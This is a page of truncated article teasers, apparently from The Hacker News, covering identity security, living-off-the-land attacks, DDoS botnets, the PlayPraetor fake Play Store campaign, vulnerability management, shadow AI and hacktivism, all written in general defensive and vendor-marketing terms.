Threat Intelligence | Breaking Cybersecurity News | The Hacker News

Identity Is the New Perimeter—And It's Fractured In 2025, identity isn't just a security issue—it's the battleground. And too many organizations are getting caught flat-footed. Organizations today must reckon with complex hybrid environments that contain interconnected endpoints, servers, cloud services, DevOps systems, identity infrastructure, and much more. And with enterprise systems no longer fitting neatly into a single network perimeter, the identities used to interact with these systems have become the new perimeter.  A strong cybersecurity foundation starts with clear visibility that puts risk in content. Identity security is no different. However, in practice, identity management systems are anything but centralized. Building IDs and access to physical offices are handled by one system. Logins to Windows machines are generally managed with Windows domains and Active Directory—but what about Macs and Linux machines? Companies use Okta, Ping Identity, or the equivalent ...

While emerging risks like AI-generated malware capture headlines, the reality of today's threat landscape is more straightforward. Most modern attacks, including ransomware, are backed by manual hacking operations. Attackers carefully navigate systems, using a "Living Off the Land" (LOTL) approach, to exploit legitimate system utilities. To figure out exactly how common these LOTL binaries are, we analyzed 700,000 security incidents from our Bitdefender GravityZone platform along with telemetry data (legitimate usage) from the last 90 days. Security incidents were not simple alerts, but correlated events, and we analyzed the whole chain of commands to identify how frequently attackers are using LOTL binaries. The result? 84% of major attacks (incidents with high severity) involved the use of LOTL binaries. For validation, we also examined our MDR data and found a consistent trend: 85% of incidents involved LOTL techniques. While this was our internal research to suppor...

The surge in DDoS attack traffic this year has been driven in part by the rapid expansion of IoT devices - from smart watches and home appliances to cars, hundreds of millions of new devices are joining the global internet. Many of these new devices feature poor security and are easily added to attacker's pool of botnets.  It is true that the DDoS threat grows alongside internet expansion. But the relationship isn't linear. The true catalyst behind this surge lies in the mass availability of botnet-for-hire platforms and low-barrier attack tools. Meanwhile, the number of high-value targets – such as financial institutions, governments, and critical infrastructure – remains relatively fixed. The result is a growing imbalance, in which more attackers are armed with more tools - targeting the same essential services with increasing frequency and complexity. How AI Makes DDoS More Dangerous  AI and machine learning are impacting the evolution of DDoS strategies and tactics. T...

CTM360 has recently observed a sophisticated global scam campaign where victims are lured through fraudulent Google Play Store download pages. CTM360, a leading cybersecurity company for Digital Risk Protection, has identified over 6,000 instances of these fake pages, tricking users into downloading malicious apps. Once installed, the apps disguise themselves as legitimate software to deploy PlayPraetor (a malware named after the authoritative Roman praetor). It seizes control of infected devices to steal banking credentials, log keystrokes, and monitor clipboard activity. The operation's global reach and complexity highlight a highly coordinated effort to compromise users' data for malicious purposes. How the Scam Works Threat actors behind PlayPraetor execute a well-crafted deception strategy: Fake Play Store Pages – Cybercriminals create highly realistic clones of Google Play Store and other trusted sources to distribute Trojanized APKs. Malicious APKs Disguised as L...

What is Threat-Led Vulnerability Management? Threat-Led Vulnerability Management (TLVM) is a security approach that focuses on prioritizing and managing vulnerabilities based on the current threat landscape and the specific risks posed to an organization. Rather than treating all vulnerabilities equally, TLVM emphasizes understanding which vulnerabilities are most likely to be exploited by malicious actors, correlated with the configuration state and security posture of the organization's unique infrastructure and business processes. Why Now? The notion of adopting a Threat-Led Vulnerability Management (TLVM) approach has grown in popularity, particularly in the face of the escalating volume and sophistication of cyber threats, which are increasingly frequent and offer a lower cost attack alternative when supported by AI tools. The dynamic nature of the threat landscape requires organizations to stay agile in their vulnerability management processes, prioritizing efforts based on ...

Shadow AI is presenting new challenges for security leaders. While AI tools have already revolutionized how we work, they've also created unprecedented security challenges that our traditional strategies or tools simply weren't designed to handle. I've spent the last decade working with organizations grappling with emerging tech risks, and I can tell you that this is different. In this post, we'll talk about why, and more importantly, what you can do about it. The Hidden Risks of AI Adoption: Shadow AI The Wiz research team recently uncovered a publicly exposed DeepSeek production ClickHouse database , leaking chat history, API secrets, and other sensitive data—raising serious concerns for any organization using DeepSeek's models. Truth is that many teams rushed to try out DeepSeek given the hype around its truly advanced technologies. While the DeepSeek situation has been surrounded by FUD, drama, and misinformation, it has also set important precedents for privacy ...

Hackers are constantly scanning your network, often spotting vulnerabilities before you do. They're looking for misconfigurations, exposed assets, and weak points that could lead to a breach—are you seeing what they see? Every activity or interaction that your organization does online – website, social media accounts, cloud services, third-party integrations, and more – contributes to its digital footprint. This digital footprint is information attackers use to find your weaknesses and attempt to exploit them.  What if you could anticipate how hackers plan to exploit your vulnerabilities before they strike? Imagine identifying the weaknesses most enticing to an attacker—before they become exploited. Attack Surface Management (ASM) solutions help organizations continuously identify, monitor and manage aspects of public-facing IT assets, including those that may be forgotten. ASM is the tool in the battle of visibility – either you see your weaknesses first, or attackers will show ...

Since Russia's latest escalation in 2022 with its invasion of Ukraine, hacktivism has surged, impacting both private and public sectors through DDoS attacks, defacements, and disinformation campaigns. These cyberattacks align with geopolitical events. As 2024 saw over 50 countries holding elections, this creates particularly ripe conditions for influence operations such as misinformation and propaganda campaigns. DDoS attacks have also intensified, with one pro-Russian hacktivist group alone claiming over 6,000 attacks since March 2022. Driven by political tensions and geopolitical conflicts, we saw a significant increase in both volume and intensity. Hacktivists are now more experienced, leveraging DDoS-for-hire services and sophisticated tools. To better understand the complex threat landscape, we aim to explore current hacktivism more deeply, examining its various facets and connections to geopolitical tensions, building on our previous findings. This article doesn't cover ...